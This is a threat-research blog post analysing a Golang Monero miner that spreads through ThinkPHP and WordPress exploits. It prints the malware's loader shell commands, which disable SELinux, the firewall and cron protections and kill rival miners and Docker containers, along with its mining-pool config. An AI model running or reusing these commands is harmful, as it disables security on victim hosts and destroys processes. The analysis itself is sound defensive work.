Akamai Diversity

Akamai Security Intelligence
& Threat Research

Another Golang Crypto Miner On The Loose

There are many crypto mining malware variants infecting systems on the internet. On Friday, March 4, 2021, I noticed an interesting hit in my honeypot logs.  The binary it captured stood out, as it was rather large at 4MB.  I immediately thought it would be a crypto miner written in the Go language. I was correct. This one however, has some newer exploits it's using for proliferation.

The malware attempted to exploit the ThinkPHP vulnerability in order to download and execute a script named ldr.sh. The loader script downloads the sysrvv binary and kills off other crypto miners.  It also adds a crontab that reinfects the system every 30 minutes using either wget, curl, or a php script instead of relying on one method of downloading the binary, and possibly failing if that utility doesn't exist.

The sysrvv binary is UPX packed meaning it's packed with the Ultimate Packer for Executables, a process where a binary is compressed but still executable using the UPX tool.  These are the unpacked stats:

 

$ file sysrvv sysrvv: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

$ sha256sum sysrvv 47183b14ed24978643de4697abe917847831b1560256ddd76e44e918a6181fd8 sysrvv

$ sha256sum sysrvv d3196b0b4767e86bf7e9e47722a5f733129c16f81f0ccbe5f822bdcfd778ca16 sysrvv 

The malware has recently been uploaded to virus total.

We are able to extract some of the details of the crypto mining pool using the strings command - a command line tool that extracts readable strings from a binary. This is helpful in tracking other malware that might be contributing to the same mining pool and therefore likely the same actor. We also can determine that they're mining Monero coins:

"pools": [

"algo": "rx/0",

"coin": null,

"url": "xmr-eu1.nanopool.org:14444",

"user":

"49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s",

"pass": "x",

"rig-id": null,

"nicehash": false,

"keepalive": true,

"enabled": true,

"tls": false,

"tls-fingerprint": null,

"daemon": false,

"socks5": null,

"self-select": null }, 

The malware attempts to kill off other crypto miners by removing their persistence and ease security restrictions by disabling SELINUX and iptables on the victim host.  It removes any other existing miners including ones hiding as docker images.

if [ $(id -u) == 0 ]; then

chattr -i /etc/ld.so.preload

ufw disable

iptables -F

service iptables

stop sysctl

kernel.nmi_watchdog=0

echo 0 >/proc/sys/kernel/nmi_watchdog

echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

setenforce 0

echo SELINUX=disabled > /etc/selinux/config

sysctl -w vm.nr_hugepages=$(nproc --all)

chattr -R -ia /var/spool/cron

chattr -ia /etc/crontab

chattr -R -ia /var/spool/cron/crontabs

chattr -R -ia /etc/cron.d

chattr -iua /tmp/

chattr -iua /var/tmp/

killall log_rot

ps aux | grep -v grep | egrep '2t3ik|qW3xT.2|ddg|./oka|postgres: .. . . /etc/ld.so.preload /etc/rc.d/init.d/kthrotlds /tmp/kthrotlds /usr/sbin/watchdogs /dev/shm/z3.sh /dev/shm/z2.sh /dev/shm/.scr /dev/shm/.kerberods /usr/bin/config.json /usr/bin/exin /usr/local/lib/libioset.so /etc/cron.d/tomcat /etc/rc.d/init.d/watchdogs docker ps | egrep 'pocosow|gakeaws|azulu|auto|xmr|mine|monero|slowhttp|bash.shell|entrypoint.sh|/var/sbin/bash' | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep 'pocosow|gakeaws|buster-slim|hello-|azulu|registry|xmr|auto|mine|monero|slowhttp' | awk '{print $3}' | xargs -I % docker rmi -f % netstat -anp | egrep ':143|:2222|:3333|:3389|:4444|:5555|:6666|:6665|:6667|:7777|:8444|:3347|:14433' | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % crontab -r 

Redress is a tool for analyzing stripped Go binaries. Based on this output we have a catalog of vulnerabilities that are being used to spread this malware. 

 

Table of Exploits 

 

The following functions are also used to attempt a brute force login, based on a list of credentials stored in the malware binary. If access is gained, the malware attempts to upload a plugin or edit a theme. 

wordpress.(*wpExec).login

wordpress.(*wpExec).exploitUploadPlugin Function to brute force login

wordpress.(*wpExec).exploitWritableTheme

wordpress.BruteXmlrpc

wordpress.pwdByUsr 

A sample of strings from the function in the binary shows a list of credentials and a curl command with the user-agent set to curl_brute_wordpress.

What is interesting is that the malware appears to set the user-agent request header to the exploit name it's attempting. This could be a good way to determine if your system has been attacked or compromised by this particular piece of malware.

There appears to be additional functions to brute force JupyterLab Notebook credentials, I suspect in an attempt to run arbitrary commands on poorly secured notebooks.

Conclusion

Crypto mining software will continue to evolve and take advantage of the latest software vulnerabilities.  Software vulnerabilities like Command Injection and Remote Code Execution will continue to be valued by cyber criminals in order to monetize your CPU cycles. What we do know for sure is that criminals are updating their malware to use the latest exploits and this might mean older vulnerabilities are either being patched or are becoming a less reliable way to compromise systems. Again, the best course of action is keeping system software updated and using strong passwords with multi factor authentication.